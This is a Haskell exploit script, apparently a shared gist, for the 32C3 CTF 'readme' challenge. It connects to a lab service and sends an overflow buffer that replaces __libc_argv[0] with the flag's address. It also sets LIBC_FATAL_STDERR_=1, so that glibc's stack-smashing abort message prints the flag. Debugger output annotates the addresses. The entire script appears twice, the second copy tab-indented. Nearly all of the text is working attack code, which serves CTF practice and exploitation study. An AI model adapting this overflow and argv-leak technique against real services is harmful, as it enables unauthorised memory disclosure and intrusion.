Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn

-- 32C3 CTF: readme
-- https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/pwn/readme-200

-- tested env:
-- $ cat /etc/os-release
-- NAME="Ubuntu"
-- VERSION="16.04.3 LTS (Xenial Xerus)"
-- ...
--
-- $ sha1sum /lib/x86_64-linux-gnu/libc-2.23.so
-- 14c22be9aa11316f89909e4237314e009da38883  /lib/x86_64-linux-gnu/libc-2.23.so

{-# LANGUAGE OverloadedStrings #-}

import           Control.Monad
import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Numeric               (showHex)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  recvuntil r "What\'s your name? "

  -- gef➤  search-pattern 32C3
  -- [+] Searching '32C3' in memory
  -- [+] In '/home/chino/CTF/readme/readme.bin'(0x400000-0x401000), permission=r-x
  --   0x400d20 - 0x400d3f  →   "32C3_TheServerHasTheFlagHere..."
  -- [+] In '/home/chino/CTF/readme/readme.bin'(0x600000-0x601000), permission=rw-
  --   0x600d20 - 0x600d3f  →   "32C3_TheServerHasTheFlagHere..."
  let flag  = 0x400d20
      flag2 = 0x600d20

  -- gef➤  p $rip
  -- $4 = (void (*)()) 0x40080e
  -- gef➤  p $rdi
  -- $5 = 0x7fffffffe320
  -- gef➤  p __libc_argv
  -- $6 = (char **) 0x7fffffffe538
  -- gef➤  p environ
  -- $7 = (char **) 0x7fffffffe548
  let buf = BS.concat $ catMaybes
            [ Just $ BS.replicate (0x7fffffffe538 - 0x7fffffffe320) 'A'
            , p64 flag    -- __libc_argv[0]
            , p64 0       -- __libc_argv[1]
            , p64 flag2   -- environ[0]
            ]
  sendline r buf

  recvuntil r "Please overwrite the flag: "
  sendline r "LIBC_FATAL_STDERR_=1"

  recvuntil r "terminated" >>= BS.putStrLn
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc --package pwn

	-- 32C3 CTF: readme
	-- https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/pwn/readme-200

	-- tested env:
	-- $ cat /etc/os-release
	-- NAME="Ubuntu"
	-- VERSION="16.04.3 LTS (Xenial Xerus)"
	-- ...
	--
	-- $ sha1sum /lib/x86_64-linux-gnu/libc-2.23.so
	-- 14c22be9aa11316f89909e4237314e009da38883 /lib/x86_64-linux-gnu/libc-2.23.so

	{-# LANGUAGE OverloadedStrings #-}

	import Control.Monad
	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Numeric (showHex)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	main :: IO ()
	main = do
	r <- remote "192.168.122.10" 4000

	recvuntil r "What\'s your name? "

	-- gef➤ search-pattern 32C3
	-- [+] Searching '32C3' in memory
	-- [+] In '/home/chino/CTF/readme/readme.bin'(0x400000-0x401000), permission=r-x
	-- 0x400d20 - 0x400d3f → "32C3_TheServerHasTheFlagHere..."
	-- [+] In '/home/chino/CTF/readme/readme.bin'(0x600000-0x601000), permission=rw-
	-- 0x600d20 - 0x600d3f → "32C3_TheServerHasTheFlagHere..."
	let flag = 0x400d20
	flag2 = 0x600d20

	-- gef➤ p $rip
	-- $4 = (void (*)()) 0x40080e
	-- gef➤ p $rdi
	-- $5 = 0x7fffffffe320
	-- gef➤ p __libc_argv
	-- $6 = (char **) 0x7fffffffe538
	-- gef➤ p environ
	-- $7 = (char **) 0x7fffffffe548
	let buf = BS.concat $ catMaybes
	[ Just $ BS.replicate (0x7fffffffe538 - 0x7fffffffe320) 'A'
	, p64 flag -- __libc_argv[0]
	, p64 0 -- __libc_argv[1]
	, p64 flag2 -- environ[0]
	]
	sendline r buf

	recvuntil r "Please overwrite the flag: "
	sendline r "LIBC_FATAL_STDERR_=1"

	recvuntil r "terminated" >>= BS.putStrLn